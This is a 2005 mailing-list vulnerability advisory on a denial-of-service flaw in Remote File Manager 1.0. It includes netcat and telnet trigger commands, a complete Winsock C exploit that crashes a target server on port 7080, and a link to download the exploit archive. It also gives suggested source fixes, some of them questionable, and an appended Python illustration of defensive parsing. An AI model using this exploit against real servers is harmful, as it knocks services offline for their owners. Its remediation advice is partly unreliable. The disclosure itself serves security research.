Message-ID: <20050508152604.C1D6E23D02@ws5-3.us4.outblaze.com>
Date: Sun May 8 18:16:01 2005
From: basher13 at linuxmail.org (eric basher)
Subject: Server Remote File Manager DOS Exploit
Update:
8:13 PM 5/7/2005
Subject:
"Server Remote File Manager DOS Exploit"
Vulnerable version:
Remote File Manager 1.0
Description:
Remote File Manager is a client/server program that allows a user to
remotely manage files on another computer via Winsock.
It includes: upload file, download file, delete file, remove directory,
get file information, and execute file.
Vulnerability:
A denial of service or buffer overflow condition occurs when a
text string is sent to the service's data handler. When the server
file manager is connected/listening for incoming data from a client,
even while the client is not properly connected to the server, we can
send a text string to the server application that causes the program
to disconnect/restart.
Try using telnet to connect to the specified IP and port (usually port 7080),
sample:
telnet localhost 7080
Connected..
<text> 'send any text; the server receives an unformatted string
that it cannot handle and has to close.
Take a look at module ModSession.bas:
dRet = Format(Bytes / 1024, "####################.##")
The source debug output will show:
Run-time error '13':
Type mismatch
This happens because the size chunk is formatted with the '#' pattern,
which expects a number, while the received field is empty or not numeric.
Otherwise we can use netcat to send a file information command that
causes the FileServer server to crash, sample:
X:\>nc -vv localhost 7080
DNS fwd/rev mismatch: infamous-group != localhost
infamous-group [127.0.0.1] 7080 (?) open
FIN"/files
The source debug output will show:
Run-time error '9':
Subscript out of range
Take a look at ParseGetFileInfo in ModSession.bas:
(..)
Set objFSO = New FileSystemObject
If Not objFSO.FileExists(sBuff(1)) Then ' Vulnerable string
sPacket = "FIN" & DELIM & "NonExist"
(..)
"FIN" is the command to get file information: "FIN"/File path.
If the file exists, the handler's array index goes out of range,
so the program has to be restarted.
Exploit:
/*
Server Remote File Manager DoS Exploit
-------------------------------------------
INFGP - Hacking&security Research
[+] Attacking localhost..
[+] Build DOS string
[+] Buffer size = 300 byte
[+] Sending bad format..
[+] localhost : Disconected!
Greats: Infam0us Gr0up,Zone-H,securiteam,str0ke-milw0rm,addict3d,
Thomas-secunia,Yudha,c0d3r,Kavling Community,1st Indonesian Security,
Jasakom,ECHO,etc..best regards t0 whell.
Info: 98.to/infamous
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

#define size 300            /* total number of bytes sent to the server */

int main(int argc, char *argv[])
{
    /* Unformatted string the server does not expect; only the first 25
       bytes are copied over the 'A' filler below */
    char req[] =
        "M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?X.JIY.HS&"
        "<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?"
        "X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYN"
        "KG&MKL\?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-"
        "qv#trog.ro#mkodph>qv#trog.ro#mkodph\n";
    int rc;
    unsigned long addr = INADDR_NONE;
    SOCKET inetsock;
    struct sockaddr_in tcp;
    struct hostent *hp;
    WSADATA wsaData;
    char buffer[size];

    memset(buffer, 'A', sizeof(buffer));
    memcpy(buffer, req, 25);

    if (argc < 2) {
        printf("\n\n Server Remote File Manager DoS Exploit \n");
        printf(" -----------------------------------------\n");
        printf(" INFGP - Hacking&Security Research\n\n");
        printf("[-]Usage: %s [target]\n", argv[0]);
        printf("[?]Exam: %s localhost \n", argv[0]);
        exit(-1);
    }
    if (WSAStartup(MAKEWORD(2, 1), &wsaData) != 0) {
        printf("WSAStartup failed !\n");
        exit(-1);
    }

    /* Resolve the target: try a host name first, then a dotted-quad address */
    hp = gethostbyname(argv[1]);
    if (!hp)
        addr = inet_addr(argv[1]);
    if (!hp && addr == INADDR_NONE) {
        printf("Unable to resolve %s\n", argv[1]);
        WSACleanup();
        exit(-1);
    }

    /* socket() returns INVALID_SOCKET (not 0) on failure */
    inetsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (inetsock == INVALID_SOCKET) {
        printf("socket() error...\n");
        WSACleanup();
        exit(-1);
    }

    memset(&tcp, 0, sizeof(tcp));
    if (hp) {
        memcpy(&tcp.sin_addr, hp->h_addr, hp->h_length);
        tcp.sin_family = hp->h_addrtype;
    } else {
        tcp.sin_addr.s_addr = addr;
        tcp.sin_family = AF_INET;
    }
    tcp.sin_port = htons(7080);      /* default Remote File Manager port */

    printf("\n[+] Attacking %s..\n", argv[1]);
    printf("[+] Build DOS string\n");
    Sleep(1000);
    printf("[+] Buffer size = %d byte\n", (int)sizeof(buffer));

    rc = connect(inetsock, (struct sockaddr *)&tcp, sizeof(struct sockaddr_in));
    if (rc == 0) {
        Sleep(1000);
        printf("[+] Sending bad format..\n");
        /* a single unformatted string is what triggers the run-time error */
        send(inetsock, buffer, sizeof(buffer), 0);
        printf("[+] %s : Disconnected! \n\n", argv[1]);
    } else {
        printf("[-] Port :7080 is invalid.Server not connected!\n");
    }

    closesocket(inetsock);
    WSACleanup();
    return 0;
}
Solution:
Vendor was notified.
Other advice: in module ModSession.bas, delete the '#' format string:
dRet = Format(Bytes / 1024, "####################.##") ' Vulnerable string
Delete the '#' pattern so the format field is empty: dRet = Format(Bytes / 1024, "")
Take a look at ParseGetFileInfo in ModSession.bas:
(..)
Set objFSO = New FileSystemObject
If Not objFSO.FileExists(sBuff(1)) Then ' Vulnerable string
sPacket = "FIN" & DELIM & "NonExist"
(..)
Change the sBuff index to 0, sample:
If Not objFSO.FileExists(sBuff(0)) Then ' index changed from 1 to 0
This keeps the File Server running.
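As an added illustration (not the product's VB source and not part of this advisory), the following Python models the two parser defects described in the Vulnerability section and the fixes proposed above: a bounds check before reading the second field of a "FIN"/path packet (the raw sBuff(1) index that raised "Subscript out of range"), and a numeric check before formatting a size field (the unchecked Format call that raised "Type mismatch"). The function names, the ProtocolError class and the choice of "/" as DELIM are assumptions; the packets in the usage section are constructed.

```python
import os
from typing import Callable, List, Optional, Tuple

DELIM = "/"  # assumed; the advisory writes the command as "FIN"/File path


class ProtocolError(ValueError):
    """Malformed client input; reported to the client instead of crashing the server."""


def parse_command(packet: str) -> Tuple[str, List[str]]:
    """Split 'VERB/arg' into (verb, args), refusing a FIN packet with no path.

    The original code indexed sBuff(1) unconditionally, so a packet without
    the delimiter produced a one-element array and a fatal run-time error.
    """
    parts = packet.rstrip("\r\n").split(DELIM, 1)
    verb = parts[0]
    if verb == "FIN" and (len(parts) < 2 or not parts[1]):
        raise ProtocolError("FIN requires a file path")
    return verb, parts[1:]


def format_kib(size_field: str) -> str:
    """Render a byte count as KiB with two decimals, as Format(Bytes / 1024, "...##") did,
    but only after confirming the field is numeric (Format on text raised error 13)."""
    text = size_field.strip()
    if not text.isdigit():
        raise ProtocolError(f"size field is not numeric: {text!r}")
    return f"{int(text) / 1024:.2f}"


def default_lookup(path: str) -> Optional[int]:
    """Return the file size, or None when the path is not an existing file."""
    return os.path.getsize(path) if os.path.isfile(path) else None


def handle_packet(packet: str, lookup: Callable[[str], Optional[int]] = default_lookup) -> str:
    """Build the reply for one packet; every bad input becomes an ERR reply, never an exception."""
    try:
        verb, args = parse_command(packet)
        if verb != "FIN":
            return "ERR" + DELIM + "unknown command"
        size = lookup(args[0])
        if size is None:
            return "FIN" + DELIM + "NonExist"      # same reply shape the advisory shows
        return "FIN" + DELIM + format_kib(str(size))
    except ProtocolError as err:
        return "ERR" + DELIM + str(err)


if __name__ == "__main__":
    # Constructed packets: the advisory's crashing input, a well-formed request,
    # and a request for a file that does not exist.
    fake_fs = {"C:\\share\\notes.txt": 1536}.get
    for pkt in ['FIN"/files', "FIN", "FIN/C:\\share\\notes.txt", "FIN/missing.txt"]:
        print(repr(pkt), "->", handle_packet(pkt, lookup=fake_fs))
```

The server-side point is that both crashes come from trusting the shape of client data: the array index assumes a delimiter was present, and the format call assumes the field was numeric. Checking both before use turns an unhandled run-time error into an ordinary protocol error reply, which is what keeps the listener up.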
Vendor URL:
http://www.niteenterprises.com/
Security Audit Tools:
http://user.7host/stardawn/files/Srfmdos.zip
Credits:
Published by - basher13[basher13@...uxmail.org]